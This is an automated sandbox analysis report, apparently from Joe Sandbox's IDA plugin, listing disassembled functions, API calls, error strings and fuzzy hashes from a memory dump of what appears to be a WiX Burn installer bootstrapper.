Similarity

API ID: String$Free$Compare
String ID: `5w$type$url
API String ID: 1324494773-456992405
Opcode ID: ce494cf67784d32131d8b1833d4eb537ebc77bd16569025b5219877eb265fcb6
Instruction ID: 13e37b746a3ab4fcd6fbfe7b0c48f28a23617bdbf63e653abfdf7f7ecc8a24ba
Opcode Fuzzy Hash: ce494cf67784d32131d8b1833d4eb537ebc77bd16569025b5219877eb265fcb6
Instruction Fuzzy Hash: C7516C35D0521AEFCB25DBA4C898EAEBFB8FF04711F204299E511EB1A0D731AE14DB50

Function 004D05A2 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 133registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,0050B500,00000000,?), ref: 004D06D3
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,0050B500,00000000,?), ref: 004D06E2

Part of subcall function 00500BE9: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,004D061A,?,00000000,00020006), ref: 00500C0E

Strings

Failed to update resume mode., xrefs: 004D06B7
Failed to delete registration key: %ls, xrefs: 004D0681
Failed to open registration key., xrefs: 004D071A
crypt32.dll, xrefs: 004D05AC
Failed to write volatile reboot required registry key., xrefs: 004D061E
%ls.RebootRequired, xrefs: 004D05F0

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Close$Create
String ID: %ls.RebootRequired$Failed to delete registration key: %ls$Failed to open registration key.$Failed to update resume mode.$Failed to write volatile reboot required registry key.$crypt32.dll
API String ID: 359002179-3398658923
Opcode ID: 9ba65c19ad5646d438191a9b5c96c65277aeaaff2a1408d77bd3184be1382ff2
Instruction ID: 442f5682d75e9842fa7f10e2b831a02153e5712d51461abc91bd2ffff4d7d1f6
Opcode Fuzzy Hash: 9ba65c19ad5646d438191a9b5c96c65277aeaaff2a1408d77bd3184be1382ff2
Instruction Fuzzy Hash: AD41B135900609FBDF22AEA1DC16FAF7BBAEF80314F10401FF50562261D779DA60DA59

Function 004DD24B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 118threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,004DAD40,?,00000000,00000000), ref: 004DD2E9
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004DD2F5

Part of subcall function 004DCF25: WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,004DD365,00000000,?,?,004DC7C9,00000001,?,?,?,?,?), ref: 004DCF37
Part of subcall function 004DCF25: GetLastError.KERNEL32(?,?,004DD365,00000000,?,?,004DC7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 004DCF41

CloseHandle.KERNEL32(00000000,00000000,?,?,004DC7C9,00000001,?,?,?,?,?,00000000,00000000,?,?,?), ref: 004DD376

Strings

fTL, xrefs: 004DD2A1
elevation.cpp, xrefs: 004DD319
Failed to create elevated cache thread., xrefs: 004DD323
QEL, xrefs: 004DD283
Failed to pump messages in child process., xrefs: 004DD34D

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$CloseCreateHandleObjectSingleThreadWait
String ID: Failed to create elevated cache thread.$Failed to pump messages in child process.$QEL$elevation.cpp$fTL
API String ID: 3606931770-3579754773
Opcode ID: 1354dee18cbe2423b268006e8d8db4a30164b8cfa7b08486eaf32465248a9f84
Instruction ID: 5b576709211765f43f9485049622dd8e4e93973ff8607aeacb4c1d2228b1092b
Opcode Fuzzy Hash: 1354dee18cbe2423b268006e8d8db4a30164b8cfa7b08486eaf32465248a9f84
Instruction Fuzzy Hash: 724105B6D01219AFDB10DF99D8859EEBBF8BF48310F10412BF914E7340E77499018B95

Function 0050159E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 117stringregistryCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000000,00000000,BundleUpgradeCode), ref: 005015DA
lstrlenW.KERNEL32(?,00000002,00000001,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 0050163C
lstrlenW.KERNEL32(?), ref: 00501648
RegSetValueExW.ADVAPI32(?,?,00000000,00000007,?,?,00000001,?,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 0050168B

Strings

BundleUpgradeCode, xrefs: 005015A7
@fR, xrefs: 005015B8
regutil.cpp, xrefs: 005016B3
@fR, xrefs: 00501633, 0050161C

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: lstrlen$Value
String ID: @fR$@fR$BundleUpgradeCode$regutil.cpp
API String ID: 198323757-4034657532
Opcode ID: efeb5fbf3f3822da811055cf5d96bedf1720984d7f1428212410fe821a5dd437
Instruction ID: 7c5f3c4dd7857356b947f39d8d1b21462d8a480677450f49a667d76f1eb7bb7f
Opcode Fuzzy Hash: efeb5fbf3f3822da811055cf5d96bedf1720984d7f1428212410fe821a5dd437
Instruction Fuzzy Hash: EC41917290062AAFCB21DF948D85EAEBBB8BF44750F050159FD01AB250C771ED119BA5

Function 004CF451 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 109stringCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 004CF48A

Part of subcall function 004C4115: CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,004DA0E8,00000000,00000000,?,00000000,004C53BD,00000000,?,?,004CD5B5,?), ref: 004C4123
Part of subcall function 004C4115: GetLastError.KERNEL32(?,004DA0E8,00000000,00000000,?,00000000,004C53BD,00000000,?,?,004CD5B5,?,00000000,00000000), ref: 004C4131

lstrlenA.KERNEL32(0050B500,00000000,00000094,00000000,00000094,?,?,004D04BF,swidtag,00000094,?,0050B518,004D04BF,00000000,?,00000000), ref: 004CF4DD

Part of subcall function 00504DB3: CreateFileW.KERNEL32(0050B500,40000000,00000001,00000000,00000002,00000080,00000000,004D04BF,00000000,?,004CF4F4,?,00000080,0050B500,00000000), ref: 00504DCB
Part of subcall function 00504DB3: GetLastError.KERNEL32(?,004CF4F4,?,00000080,0050B500,00000000,?,004D04BF,?,00000094,?,?,?,?,?,00000000), ref: 00504DD8

Strings

Failed to write tag xml to file: %ls, xrefs: 004CF51B
swidtag, xrefs: 004CF49D
Failed to allocate regid folder path., xrefs: 004CF53C
Failed to format tag folder path., xrefs: 004CF543
Failed to allocate regid file path., xrefs: 004CF535
Failed to create regid folder: %ls, xrefs: 004CF525

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CreateErrorLast$DirectoryFileOpen@16lstrlen
String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to format tag folder path.$Failed to write tag xml to file: %ls$swidtag
API String ID: 904508749-1201533908
Opcode ID: 2bbca7d626439d1be3cc3ab80568c69b65dd7b629dec1509c4172870bd303c23
Instruction ID: d22fb3a04e92a584bcc8a6ac821cc5959ebb2ec7b242c999d4bc5ed70455c082
Opcode Fuzzy Hash: 2bbca7d626439d1be3cc3ab80568c69b65dd7b629dec1509c4172870bd303c23
Instruction Fuzzy Hash: 2F31BF39C0062ABBDB619E94CC05F9DBBB5BF04310F1081AAEA00B6252D7799E54DB98

Function 004D53E2 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 91synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0002BF20,?,F0000003,00000000,00000000,?,00000000,00000000,00000000,004C548E,00000000,00000000,?,00000000), ref: 004D548B
GetLastError.KERNEL32(?,?,?,004C4C61,?,?,00000000,?,?,?,?,?,?,0050B4A0,?,?), ref: 004D5496

Strings

Failed to write exit code to message buffer., xrefs: 004D5406
pipe.cpp, xrefs: 004D54BA
Failed to post terminate message to child process cache thread., xrefs: 004D545A
Failed to post terminate message to child process., xrefs: 004D5476
Failed to wait for child process exit., xrefs: 004D54C4
Failed to write restart to message buffer., xrefs: 004D542E

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLastObjectSingleWait
String ID: Failed to post terminate message to child process cache thread.$Failed to post terminate message to child process.$Failed to wait for child process exit.$Failed to write exit code to message buffer.$Failed to write restart to message buffer.$pipe.cpp
API String ID: 1211598281-2161881128
Opcode ID: fb3bc16e526313bb41bd8c88a9a55de51edd267ac29495f8c56f249ec869412a
Instruction ID: d1d4718992171a11ef6cea69f10edbe4fe41f8a020262812df564e5374cb0a09
Opcode Fuzzy Hash: fb3bc16e526313bb41bd8c88a9a55de51edd267ac29495f8c56f249ec869412a
Instruction Fuzzy Hash: CB21E937940A2AB7DF225A50DC15FEE7B68BF00765F104217F900B6390DB38AD909ADA

Function 004D9098 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 89fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000101,?,004D9F04,00000003,000007D0,00000003,?,000007D0), ref: 004D90B2
GetLastError.KERNEL32(?,004D9F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001,?), ref: 004D90BF
CloseHandle.KERNEL32(00000000,?,004D9F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001), ref: 004D9187

Strings

Failed to open payload at path: %ls, xrefs: 004D9103
Failed to verify hash of payload: %ls, xrefs: 004D9172
Failed to verify catalog signature of payload: %ls, xrefs: 004D914E
Failed to verify signature of payload: %ls, xrefs: 004D912F
cache.cpp, xrefs: 004D90F6

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: Failed to open payload at path: %ls$Failed to verify catalog signature of payload: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$cache.cpp
API String ID: 2528220319-2757871984
Opcode ID: 10090cf5d7edefe750b5f4409f5447427ad2d229c3107fd24f258876ea68b387
Instruction ID: 344a7c7a5fa6fd883c4a00ceb9d9e1df8cceb01bf72ec2685928b9181d0252f9
Opcode Fuzzy Hash: 10090cf5d7edefe750b5f4409f5447427ad2d229c3107fd24f258876ea68b387
Instruction Fuzzy Hash: 4821E536540627B7EB321A688C6DF9F7E28BF44760F104313FD14A639093799C61EAD9

Function 004C6B1E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 88COMMON

Download Yara Rule

APIs

GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004C6B69
GetLastError.KERNEL32 ref: 004C6B73
GetVolumePathNameW.KERNEL32(?,?,00000104), ref: 004C6BB7
GetLastError.KERNEL32 ref: 004C6BC1

Strings

variable.cpp, xrefs: 004C6B97, 004C6BE5
Failed to set variant value., xrefs: 004C6C0B
Failed to get windows directory., xrefs: 004C6BA1
Failed to get volume path name., xrefs: 004C6BEF

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$DirectoryNamePathVolumeWindows
String ID: Failed to get volume path name.$Failed to get windows directory.$Failed to set variant value.$variable.cpp
API String ID: 124030351-4026719079
Opcode ID: dfc0cf02df0480f6f4e01e4b8aa10e990ec4ac67786feca09ee8a6dfed17ea44
Instruction ID: 1832100e3502adefca8da5f96768f9139464c2a32dbccd9ca77cea945e8b008d
Opcode Fuzzy Hash: dfc0cf02df0480f6f4e01e4b8aa10e990ec4ac67786feca09ee8a6dfed17ea44
Instruction Fuzzy Hash: 0E212C7BE4123967D730A7558C0AF9F77ACAB40710F01416BBD04F7281E638AE408AF9

Function 004C9C6D Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 004C9C88
GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,000002C0,?,004CA895,00000100,000002C0,000002C0,?,000002C0), ref: 004C9CA0
GetLastError.KERNEL32(?,004CA895,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 004C9CAB

Strings

File search: %ls, did not find path: %ls, xrefs: 004C9CFD
Failed get to file attributes. '%ls', xrefs: 004C9CE8
Failed to set variable., xrefs: 004C9D2B
search.cpp, xrefs: 004C9CDB
Failed to format variable string., xrefs: 004C9C93

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Failed get to file attributes. '%ls'$Failed to format variable string.$Failed to set variable.$File search: %ls, did not find path: %ls$search.cpp
API String ID: 1811509786-2053429945
Opcode ID: 70bf62ce69824a6cfe27828e419fd3074bb934bf63f2e283fdce9476e6f0ca7d
Instruction ID: 1e3d335045f10745496c19c7c282c85fd5e4a22ee2cf67dd37d6736d19f2af34
Opcode Fuzzy Hash: 70bf62ce69824a6cfe27828e419fd3074bb934bf63f2e283fdce9476e6f0ca7d
Instruction Fuzzy Hash: 5521683B940125BBEB611A948C8FFAEBB68FF10761F20021FFD05762D0D7299D00A6D9

Function 004DAD40 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,?), ref: 004DAD57
GetLastError.KERNEL32 ref: 004DAD61
CoInitializeEx.OLE32(00000000,00000000), ref: 004DADA0
CoUninitialize.OLE32(?,004DC721,?,?), ref: 004DADDD

Strings

elevation.cpp, xrefs: 004DAD85
Failed to initialize COM., xrefs: 004DADAC
Failed to set elevated cache pipe into thread local storage for logging., xrefs: 004DAD8F
Failed to pump messages in child process., xrefs: 004DADCB

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorInitializeLastUninitializeValue
String ID: Failed to initialize COM.$Failed to pump messages in child process.$Failed to set elevated cache pipe into thread local storage for logging.$elevation.cpp
API String ID: 876858697-113251691
Opcode ID: f22fe72803027a1b97fdacba82423f61a6710cc8c6172f4b9ee182b9ed9f7233
Instruction ID: d86d6c2797eb65e3a291d2376e92c170d375fe13bac860c5b2b5c78a64d8c20f
Opcode Fuzzy Hash: f22fe72803027a1b97fdacba82423f61a6710cc8c6172f4b9ee182b9ed9f7233
Instruction Fuzzy Hash: E7117673941632BBE7215744CC09D9FBE6AEF14B62B100117FC00B3340EB389D1092DA

Function 004C5CE2 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 54registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 004C5D68

Part of subcall function 005010B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0050112B
Part of subcall function 005010B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00501163

Strings

Failed to ensure path was backslash terminated., xrefs: 004C5D52
+, xrefs: 004C5CEA
CommonFilesDir, xrefs: 004C5CF0, 004C5D24, 004C5D33
ProgramFilesDir, xrefs: 004C5CF7
Failed to open Windows folder key., xrefs: 004C5D1A
SOFTWARE\Microsoft\Windows\CurrentVersion, xrefs: 004C5D05
Failed to read folder path for '%ls'., xrefs: 004C5D34

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: QueryValue$Close
String ID: +$CommonFilesDir$Failed to ensure path was backslash terminated.$Failed to open Windows folder key.$Failed to read folder path for '%ls'.$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
API String ID: 1979452859-3209209246
Opcode ID: 557832654bfd3d051833c914d739914d31378297f6d101d79aec9d77095c7193
Instruction ID: 4fc9c6a0ed6b40401bc8cd4141c37ad005c71130617234a1da9e0fefe0b01cf5
Opcode Fuzzy Hash: 557832654bfd3d051833c914d739914d31378297f6d101d79aec9d77095c7193
Instruction Fuzzy Hash: 74016D36A04729B7CB215694CC0EF6E7F78EF40720F14811AF801762E1D7749E40D6E9

Function 004FA20B Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,y4O,004F3479,?,?,?,004FA45C,00000001,00000001,ECE85006), ref: 004FA265
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,004FA45C,00000001,00000001,ECE85006,?,?,?), ref: 004FA2EB
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,ECE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004FA3E5
__freea.LIBCMT ref: 004FA3F2

Part of subcall function 004F521A: HeapAlloc.KERNEL32(00000000,?,?,?,004F1F87,?,0000015D,?,?,?,?,004F33E0,000000FF,00000000,?,?), ref: 004F524C

__freea.LIBCMT ref: 004FA3FB
__freea.LIBCMT ref: 004FA420

Strings

y4O, xrefs: 004FA21D

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocHeap
String ID: y4O
API String ID: 3147120248-4180157755
Opcode ID: 932910f2e4d4b007bd517b2a750f42f428b7b923c7c56b045ebbee949c7761e5
Instruction ID: 7cdb8efd1564ac5a9f3b721ac7929719bb09d8bbbd4f4bba96875333189698eb
Opcode Fuzzy Hash: 932910f2e4d4b007bd517b2a750f42f428b7b923c7c56b045ebbee949c7761e5
Instruction Fuzzy Hash: CD5129B261021EAFDB294F65CC81EBF37A9EF44750F15422AFE08D6240EB38DC90D656

Function 004EA271 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 174COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(?,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 004EA33E
GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 004EA348

Strings

apply.cpp, xrefs: 004EA36C
download, xrefs: 004EA308
Failed attempt to download URL: '%ls' to: '%ls', xrefs: 004EA425
Failed to clear readonly bit on payload destination path: %ls, xrefs: 004EA377
:, xrefs: 004EA3C1

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: :$Failed attempt to download URL: '%ls' to: '%ls'$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$download
API String ID: 1799206407-1905830404
Opcode ID: 67bf96e869a3de338064b965eb26df6713a7500fc2c47467ac258beb9a2d2990
Instruction ID: 066cf6366360db0effc816ea73dbe1fe6c8218c2be9a337eed856e9d4bbd4b7a
Opcode Fuzzy Hash: 67bf96e869a3de338064b965eb26df6713a7500fc2c47467ac258beb9a2d2990
Instruction Fuzzy Hash: F151C175E00219ABDB10DF9AC845AAFBBB5FF04711F10805AE904EB340E379EE50CB96

Function 005084C7 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 156COMMON

Download Yara Rule

APIs

Part of subcall function 004C394F: GetProcessHeap.KERNEL32(?,000001C7,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3960
Part of subcall function 004C394F: RtlAllocateHeap.NTDLL(00000000,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3967

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000010,00000001,00000000,00000000,00000410,?,?,004E9063,000002C0,00000100), ref: 005084F5
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF,?,?,004E9063,000002C0,00000100,000002C0,000002C0,00000100,000002C0,00000410), ref: 00508510

Strings

http://appsyndication.org/2006/appsyn, xrefs: 005084E8
application, xrefs: 00508502
apuputil.cpp, xrefs: 005085AB
type, xrefs: 00508537

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CompareHeapString$AllocateProcess
String ID: application$apuputil.cpp$http://appsyndication.org/2006/appsyn$type
API String ID: 2664528157-4206478990
Opcode ID: 637866b2ef9a7d5784f58a3e45a0dcc39cd168d4e749c5a60f3d4b34a46a767c
Instruction ID: 30ec830b4d2b582d7b36f1a633e99fcf7c7fdf6dd6886630c8fa0136f3d79bab
Opcode Fuzzy Hash: 637866b2ef9a7d5784f58a3e45a0dcc39cd168d4e749c5a60f3d4b34a46a767c
Instruction Fuzzy Hash: 8351A071A44701BFDB209E15CD85F2E7FA5BF10720F218618FAA5AB2D2DBB1ED408B54

Function 005064B7 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154fileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00506513
DeleteFileW.KERNEL32(00000410,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 0050660A
CloseHandle.KERNEL32(000000FF,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 00506619

Strings

dlutil.cpp, xrefs: 00506537
Burn, xrefs: 00506502
WiX\Burn, xrefs: 00506551
DownloadTimeout, xrefs: 0050654C

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CloseDeleteErrorFileHandleLast
String ID: Burn$DownloadTimeout$WiX\Burn$dlutil.cpp
API String ID: 3522763407-1704223933
Opcode ID: 1407dc781b16129fc896f4ef22a456882df618c010b16517bb697fc34f969098
